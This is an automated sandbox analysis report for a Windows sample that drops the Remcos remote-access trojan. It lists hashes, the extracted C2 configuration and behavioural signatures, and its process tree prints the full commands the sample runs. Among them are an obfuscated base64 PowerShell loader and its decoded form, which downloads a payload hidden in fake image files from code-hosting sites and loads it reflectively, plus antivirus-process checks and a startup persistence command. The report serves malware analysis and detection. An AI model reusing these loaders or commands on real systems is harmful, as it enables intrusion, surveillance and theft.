Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
10-10-2024 11:39
General
-
Target
6706e721f2c06.exe
-
Size
160KB
-
MD5
9d26cee91cd86b11808a161681be9f85
-
SHA1
f0334a5e2d01bbaf5bdb4a103bf9504dad218f85
-
SHA256
c3dee07cba853e66489d883ef5bcc094ea32861828ebfcde773e7527726be35c
-
SHA512
c18981b4b41faa942159c12a27b8ef6bcf16905b160cbe59b92823b52eabfeb698d1f44614bfc03162926d044681a1be54aa24bd13b3624f05d9c0cd0ee0f3d4
-
SSDEEP
3072:1ahKyd2n31D5GWp1icKAArDZz4N9GhbkrNEk18HzvT:1ahObp0yN90QEV
Malware Config
Extracted
remcos
host_one
101.99.94.69:2404
101.99.94.69:8090
101.99.94.69:44444
101.99.94.69:80
101.99.94.69:21
101.99.94.69:4899
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
rmc
-
mouse_option
false
-
mutex
Rmc-UP4CTA
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Blocklisted process makes network request 5 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 3 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Windows directory 5 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies registry class 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 42 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\6706e721f2c06.exe"C:\Users\Admin\AppData\Local\Temp\6706e721f2c06.exe"2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c 6706e721f2c06.vbs3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6706e721f2c06.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##g#D0#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Cw#I##k#GI#YQBz#GU#Ng#0#Ew#ZQBu#Gc#d#Bo#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#KQ#7#C##J#Bs#G8#YQBk#GU#Z#BB#HM#cwBl#G0#YgBs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#bQBh#G4#Z#BC#Hk#d#Bl#HM#KQ#7#C##J#B0#Hk#c#Bl#C##PQ#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C4#RwBl#HQ#V#B5#H##ZQ#o#Cc#d#Bl#HM#d#Bw#G8#dwBl#HI#cwBo#GU#b#Bs#C4#S#Bv#G0#ZQ#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bt#GU#d#Bo#G8#Z##g#D0#I##k#HQ#eQBw#GU#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#b#Bh#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##K##n#C##d#B4#HQ#LgBj#HI#aQBq#EY#awBG#C8#cwBk#GE#bwBs#G4#dwBv#GQ#LwBm#Hc#Zg#v#Hc#ZgBz#GY#dwBm#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.crijFkF/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\PdfReaderEn.EXEC:\Users\Admin\AppData\Local\Temp\PdfReaderEn.EXE8⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Kits Kits.bat & Kits.bat9⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist10⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"10⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\tasklist.exetasklist10⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"10⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 60342310⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "speechesdjexpandingsoviet" Controllers10⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Southampton + ..\Transition + ..\Mars + ..\Paying + ..\Clay + ..\Usually + ..\Fighters + ..\Disposition + ..\Models + ..\Semester s10⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\603423\Lucas.pifLucas.pif s10⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 510⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\MicrosoftServiceUpdater.exeC:\Users\Admin\AppData\Local\Temp\MicrosoftServiceUpdater.exe8⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c one.vbs9⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\one.vbs"10⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##g#D0#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Cw#I##k#GI#YQBz#GU#Ng#0#Ew#ZQBu#Gc#d#Bo#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#KQ#7#C##J#Bs#G8#YQBk#GU#Z#BB#HM#cwBl#G0#YgBs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#bQBh#G4#Z#BC#Hk#d#Bl#HM#KQ#7#C##J#B0#Hk#c#Bl#C##PQ#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C4#RwBl#HQ#V#B5#H##ZQ#o#Cc#d#Bl#HM#d#Bw#G8#dwBl#HI#cwBo#GU#b#Bs#C4#S#Bv#G0#ZQ#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bt#GU#d#Bo#G8#Z##g#D0#I##k#HQ#eQBw#GU#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#b#Bh#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##K##n#C##d#B4#HQ#LgBt#H##YwBm#FM#bgBr#C8#cwBk#GE#bwBs#G4#dwBv#GQ#LwBm#Hc#Zg#v#Hc#ZgBz#GY#dwBm#C8#ZwBy#G8#LgB0#GU#awBj#HU#YgB0#Gk#Yg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.mpcfSnk/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec12⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"13⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoCraft.url" & echo URL="C:\Users\Admin\AppData\Local\DesignInno Innovations\InnoCraft.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoCraft.url" & exit2⤵
- Drops startup file
- System Location Discovery: System Language Discovery
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD54627aa356c682263c12480a6fd303da7
SHA12f862d8131261ac2e523dcbaae3dd70d27aabc0b
SHA256df87b917a2b2fb26d39d181543bf28946d203600a03c135a0946e0d631f72a99
SHA512b91d35513f13d5553433282ce94aeff89537212e4639f2188be48e4f73c847d63ae1cbd30a6866b9658e7cf55b45392a6ea81a32ad58423b4571d5589354110a
-
Filesize
224B
MD50a606846b44b58be183c452ae8d7d1d4
SHA137ae0606d42a496e9a7de7318bd694e709e74010
SHA256e4569b60358d11fb89f026811d4f7ec1e00cb9489894e7ca77ff0bfe13e2fc7e
SHA512cbab513003cecb4141ffa182ef1c7964410348e262a731bf73f2c1b7448a41db2ff6d2ca256cb79acddcd1660348c7401496b0a47596ae8265a03ef8c4f919ad
-
Filesize
3KB
MD5906a96ab3d13d754809f312628f6e4ac
